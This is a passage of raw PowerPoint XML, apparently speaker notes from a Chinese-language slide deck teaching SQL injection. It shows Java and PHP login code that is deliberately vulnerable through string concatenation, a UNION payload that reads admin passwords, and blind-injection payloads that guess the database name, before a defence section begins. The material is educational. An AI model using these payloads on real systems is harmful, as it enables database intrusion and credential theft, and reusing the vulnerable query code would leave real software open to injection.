              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(”username") + “’ and password=‘” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(”password“) + “’;“ ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>conn.execqueryResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>示例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = "select * from users where username=‘"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.$_REQUEST[”username"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. “’ and password=‘”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.$_REQUEST[”password"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1"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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>($link,$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288166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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>需要获取最多信息时，联合查询是最好的方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>例如：原有语句是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> select username, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t> from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t> = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我们可以在后面增加语句，来查询我们想要的内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>select username,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t> from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t> = 1 and 1=2 union all select username, password from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>admin_user</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>因为前面的条件变成 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，因此原本的内容会隐藏，会显示新写的内容。最后写</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 是因为返回多条数据，可能会出问题。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>根据具体情况，可以进行修改。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>盲注，就像对不好处理。每次返回的内容是有“是”，“否”之分。因此我们只能一点点判断</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>比如：我们判断数据库名称长度：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1’ and length(database())=1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，显示不存在；</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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1’ and length(database())=2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，显示不存在；</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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1’ and length(database())=3 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，显示不存在；</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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1’ and length(database())=4 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，显示存在：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>这样我们能判断数据库名长度是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4.</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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1’ and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ascii</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substr</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databse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(),1,1))=100 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，显示存在</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>意味着数据库名第一个字符是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>参考： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www.freebuf.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/articles/web/120985.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="793213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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>www.netsparker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/blog/web-security/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-injection-cheat-sheet/</a:t>
            </a:r>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2104364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防护</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入，从用户访问开始到最后返回数据：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>前面使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等设备过滤简单的</a:t>
            </a:r>
            <a:r>
